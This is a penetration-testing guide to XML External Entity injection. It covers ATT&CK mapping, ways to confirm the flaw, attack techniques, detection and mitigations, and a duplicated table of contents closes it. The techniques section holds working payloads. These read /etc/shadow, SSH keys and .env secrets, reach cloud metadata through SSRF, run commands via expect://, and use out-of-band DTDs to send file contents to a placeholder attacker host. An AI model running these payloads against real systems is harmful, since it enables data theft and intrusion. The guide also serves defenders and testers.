XML External Entity (XXE) Injection

Overview

XXE injection exploits XML parsers that process external entity definitions. When an application parses user-supplied XML without disabling external entities, the attacker can read local files, perform server-side request forgery (SSRF), exfiltrate data out-of-band, or in some cases achieve remote code execution.

XXE affects any application that parses XML input — SOAP APIs, XML-RPC, file uploads (DOCX, XLSX, SVG), RSS/Atom feeds, SAML authentication, and custom XML APIs.

ATT&CK Mapping

Tactic: TA0009 - Collection
Technique: T1005 - Data from Local System
Tactic: TA0001 - Initial Access
Technique: T1190 - Exploit Public-Facing Application

Prerequisites

Application accepts and parses XML input
XML parser has external entity processing enabled (the default in many libraries)
No input validation stripping DTD declarations

Detection Methodology

Identifying XML Endpoints

XXE can exist anywhere XML is parsed, not just obvious XML APIs:

SOAP web services
REST APIs accepting Content-Type: application/xml or text/xml
File upload endpoints (DOCX, XLSX, SVG, XML config files)
SAML SSO endpoints
RSS/Atom feed importers
Applications using Content-Type: application/xml (try changing application/json to application/xml — some frameworks auto-parse)

Confirming XXE

Submit a basic entity definition and check if it resolves:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe "XXE_TEST_STRING">
]>
<root>&xxe;</root>

If XXE_TEST_STRING appears in the response, the parser processes entities.

Techniques

Classic XXE — File Read

Read local files by defining an external entity pointing to a file:// URI:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

The file contents replace &xxe; in the response.

Common targets:

file:///etc/passwd
file:///etc/shadow           (requires root)
file:///etc/hostname
file:///proc/self/environ    (environment variables — may contain secrets)
file:///proc/self/cmdline    (running process command line)
file:///home/user/.ssh/id_rsa
file:///var/www/html/config.php
file:///var/www/html/.env

Windows targets:

file:///c:/windows/system32/drivers/etc/hosts
file:///c:/inetpub/wwwroot/web.config
file:///c:/windows/win.ini

XXE to SSRF

Use external entities to make the server request internal resources:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>

This queries the AWS metadata service from the server's network. Also useful for scanning internal hosts:

<!ENTITY xxe SYSTEM "http://192.168.1.1:8080/">
<!ENTITY xxe SYSTEM "http://internal-app.corp.local/admin">

When the entity value is not reflected in the response, use out-of-band channels to exfiltrate data.

Step 1 — Host a malicious DTD on the attacker server:

Create evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER_IP:8000/?data=%file;'>">
%eval;
%exfil;

Step 2 — Submit payload referencing the external DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://ATTACKER_IP:8000/evil.dtd">
  %xxe;
]>
<root>test</root>

Step 3 — Catch the exfiltrated data:

# Start a listener
python3 -m http.server 8000

The server makes a request to http://ATTACKER_IP:8000/?data=<file_contents>, visible in the HTTP server logs.

Limitation: OOB exfiltration via HTTP URIs fails for files containing XML-special characters (<, &) or newlines. Use the FTP protocol for multi-line file exfiltration.

FTP handles multi-line data better than HTTP for exfiltration:

evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'ftp://ATTACKER_IP:2121/%file;'>">
%eval;
%exfil;

Use a simple FTP listener (e.g., Python pyftpdlib or a custom script) to capture the data.

Error-Based XXE

Force the parser to include file contents in error messages:

evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser error message reveals the file contents: file:///nonexistent/webserver01 (where webserver01 is the hostname).

XXE via File Uploads

Office documents (DOCX, XLSX, PPTX) and SVG files are XML-based. If the application parses their XML content, XXE is possible.

SVG:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <text x="0" y="20">&xxe;</text>
</svg>

DOCX/XLSX:

Create a valid DOCX/XLSX file
Unzip it (Office formats are ZIP archives containing XML)
Inject XXE payload into one of the XML files (e.g., [Content_Types].xml, word/document.xml)
Rezip and upload

# Unzip DOCX
mkdir docx_extracted && cd docx_extracted
unzip ../document.docx

# Edit XML files to inject XXE payload
# Then rezip
zip -r ../malicious.docx .

XInclude

When you don't control the entire XML document (e.g., your input is inserted into a specific field), you cannot define a DTD. Use XInclude instead:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

XInclude works when the parser supports it and your input lands inside an XML element.

PHP-Specific — XXE with Expect

If the PHP expect module is loaded, XXE can achieve direct command execution:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>

The expect:// wrapper executes commands and returns output. This requires the php-expect extension, which is rare in production.

CDATA Exfiltration

Files containing XML-special characters (<, &) break standard XXE file read. The CDATA wrapper technique constructs a general entity containing the file contents wrapped in a CDATA section, using an external DTD.

evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContent '%start;%file;%end;'>">
%all;

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://ATTACKER_IP:8000/evil.dtd">
  %xxe;
]>
<root>&fileContent;</root>

%all; defines a general entity &fileContent; (not a parameter entity). The general entity &fileContent; is then referenceable in the document body. Note: CDATA sections cannot themselves contain ]]> — files containing that sequence will truncate the output.

Detection Methods

Network-Based Detection

XML payloads containing <!DOCTYPE and <!ENTITY declarations in HTTP requests
Outbound requests from the web server to unexpected IPs (SSRF/OOB indicators)
HTTP requests containing SYSTEM keyword with file://, http://, ftp://, or expect:// URIs
DNS queries from the web server for attacker-controlled domains

Host-Based Detection

XML parser accessing local files outside the application directory
Application process making HTTP/FTP connections not part of normal workflow
Error logs containing XML parsing errors with file path references
Monitoring for access to sensitive files (/etc/passwd, /etc/shadow, /proc/self/environ)

Mitigation Strategies

Disable external entity processing — the most effective mitigation. Every XML library has a configuration option:
PHP: libxml_disable_entity_loader(true) (deprecated in PHP 8.0+, external entities disabled by default)
Java: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
Python (lxml): etree.XMLParser(resolve_entities=False)
.NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit
Disable DTD processing entirely — prevents all DTD-based attacks including billion laughs DoS
Use less complex data formats — prefer JSON over XML when possible
Input validation — strip or reject <!DOCTYPE and <!ENTITY declarations before parsing
Patch XML libraries — ensure parsers are up to date with security patches

XML External Entity (XXE) Injection

Overview

ATT&CK Mapping

Prerequisites

Detection Methodology

Identifying XML Endpoints

Confirming XXE

Techniques

Classic XXE — File Read

XXE to SSRF

Blind XXE — Out-of-Band (OOB) Data Exfiltration

Blind XXE via FTP

Error-Based XXE

XXE via File Uploads

XInclude

PHP-Specific — XXE with Expect

CDATA Exfiltration

Detection Methods

Network-Based Detection

Host-Based Detection

Mitigation Strategies

References

Pentest Guides & Research

MITRE ATT&CK